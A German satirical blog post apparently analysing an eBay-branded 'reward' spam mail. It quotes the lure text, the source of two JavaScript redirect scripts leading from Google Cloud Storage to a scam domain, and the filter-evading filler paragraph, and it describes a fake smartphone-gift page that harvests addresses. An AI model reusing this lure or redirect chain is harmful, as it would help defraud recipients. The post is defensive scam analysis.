Nein, ich werde einfach nur zu einer Bestellnummer und zum Namensteil einer Mailadresse gemacht. Nicht nett, aber immer noch ein bisschen netter als zu brennen. 🤖️

Und solche Nummern sehen immer so 🚨️WICHTIG🚨️ aus! 🙃️

Congratulations gammelfleisch,

* Thank you for using ebay. Your recent purchase has got you eligible for an exclusive reward worth $90. You are one of 10 randomly selected ebay customers who will receive this reward. You have been rewarded a free reward worth $90. Just click on the button below to claim your reward.

Click here

Ich bin gar kein iieh-Bäh-Kunde. Ich habe dort niemals irgendwas gekauft. iieh-Bäh hat auch gar keine Mailadresse von mir. Diese Spam kann also bei jedem ankommen, dessen Mailadresse irgendwo eingesammelt werden konnte. 💩️

Und natürlich führt der Click-here-Link nicht etwa zu iieh-Bäh, sondern in die „Cloud“ des besten Freundes der Spammer, Asozialen und Kriminellen, in die „Cloud“ von Google. Dort gibt es dann…

$ lynx -dump -source "https://storage.googleapis.com/01439e9df401e2e/alinkasa.html#/rd/su19752eGlZa50571355GmAg300617Viz2299yWsv716"
<script>
var url= document.location;
var str1=url.toString();
var res = str1.split("#");
var newurl="http://jarjav.com/rd/"+res[1];
window.location.href = newurl;
</script>
$ _

…eine Weiterleitung zur Website in der Domain jarjav (punkt) com, die natürlich auch nichts mit eBay zu tun hat. Und da sind wieder die Idioten…

$ lynx -dump -source http://jarjav.com/rd//rd/su19752eGlZa50571355GmAg300617Viz2299yWsv716
<script>
var tarcking_param = window.location.href.split('#')[1];
if(!tarcking_param){
	document.location.href = document.location.href.replace("/rd/", "/track/");
}else{
	document.location.href = '/track/'+tarcking_param;
}
</script>
$ _

…mit dem charakteristischen Verschreiber „tarcking“ statt „tracking“ zu Gange und machen die nächste Javascript-Weiterleitung. Wer nicht jedem Hirnkrepel über ein anonymes Medium die Ausführung von Javascript-Code im Webbrowser gestattet, sondern einen wirksamen Skriptblocker verwendet, sieht einfach nur eine weiße Seite und kann auf den Schwindel gar nicht reinfallen. Wer hingegen seinen Webbrowser in der Standardkonfiguration betreibt, landet schließlich nach sechs weiteren in Javascript realisierten Weiterleitungen auf einer obskuren Geschenkseite, die genau so wenig von Vodafone kommt, wie die Spam von eBay kommt:

Wer sich über die IP-Adresse wundert: Die stimmt sogar. Diese Spammer senden jedem, der über Tor kommt, nur noch einen HTTP-Fehler 403 „Forbidden“ zurück. Sie haben kein Interesse daran, dass ihre Seitenbesucher anonym bleiben. Das wäre auch schlecht für ihr „Geschäft“. 👥️

Und natürlich hat diese Website auch nichts mit Amazon zu tun, wie in der Fußzeile noch einmal in kleinen Buchstaben klargemacht wird. Offenbar kommen diese Leute mit ihren vielen Nummern und ihren vielen missbrauchten Firmierungen selbst ein bisschen damit durcheinander, als was sie sich gerade ausgegeben haben. Diese Website hat übrigens auch nichts mit Anstand und Ehrlichkeit zu tun. 👎️

Alle Daten, die man dort als „Lieferadresse“ für ein hochpreisiges Smartphone angibt, gehen direkt an Kriminelle. Damit kann man leicht jahrelangen Ärger haben. Das Telefon gibt es nicht. Es ist nur der Köder, damit man so etwas unendlich Dummes macht. 🎣️

The advertiser does not manage your subscription.

Genau, der Spammer kann überhaupt nichts für diese Spam. Ihr könnt mich auch mal hinten lecken! 👅️

If you prefer not to receive further communication please unsubscribe here

Dieser Link geht auf den exakt gleichen URI wie der Click-here-Link, der auf das Smartphone-Geschenk führt, weil ich so eine schöne IP-Adresse habe.

So, und jetzt noch das Siegel auf die Spam, jetzt gibt es noch einmal 2989 Buchstaben, die 518 sinnlos aneinandergehängte Wörter in einem mechanisch generierten Absatz formen, damit es für den Spamfilter so aussieht, als sei diese Spam keine Spam:

our support forum at the bottom. Your membership delivers faster reservations and rentals, a special members-only line at major airport locations and exclusive discounts. Thank you! all along your road to budgeting glory. Please confirm by clicking the link you to see what the software is capable of. === Account Information === before all sorts of great things happen. Like your being able to use YNAB Joining me for a quick demo will be the fastest and most efficient way for thanks for requesting a demo. and log in with your member number. Hello! Quick note to let you know that your email needs to be confirmed == You need a budget, and your email needs confirmation. == Your Enterprise Plus member number and user name is HYFYF4W. Did any of the times on our website work for you and if so, were you able below: if you need additional help there's a link to to schedule a demo okay? bask in it. Username: sgfdg Powered by gvcnvqnijg In addition, you'll be able to start earning points you can redeem for Free Rental Days after you activate your rewards. Please allow 24 hours for system updates before activating. If not, just let me know and we'll find something else. Site ID: fwh Dylan Basile everything you need to get started below, and Thanks for signing up, and congratulations Here they are again: Dear lcTychll rGhEG, My name's Dylan Basile and I work at Event Temple. Nice to meet you and To get the most from your next rental, simply go to And we're serious about budgeting glory. It's a real thing, and you will Welcome to the Enterprise Plus? membership experience. on your new gvcnvqnijg account! You'll find The YNAB Team – Hi dhg, Thanks again! === Your Account Console === Hi dfdh, Regards, *Book a demo with me here:* Team gvcnvqnijg Confirm your email Thank you for choosing Enterprise. We look forward to making your next rental experience more rewarding. < Your Did any of the times on our website work for you and if so, were you able Here they are again: Your membership delivers faster reservations and rentals, a special members-only line at major airport locations and exclusive discounts. > Welcome to the Enterprise Plus? membership experience. to schedule a demo okay? To get the most from your next rental, simply go to and log in with your member number. thanks for requesting a demo. In addition, you'll be able to start earning points you can redeem for Free Rental Days after you activate your rewards. Please allow 24 hours for system updates before activating. Thank you for choosing Enterprise. We look forward to making your next rental experience more rewarding. Hi o19752ZCLJr50571355IbUM300617CIi2299ulwV716, My name's Dylan Basile and I work at Event Temple. Nice to meet you and Joining me for a quick demo will be the fastest and most efficient way for Enterprise Plus member number and user name is HYFYF4W. you to see what the software is capable of. Dear reillygerald931 vlyrv, If not, just let me know and we'll find something else.

Entf! 🗑️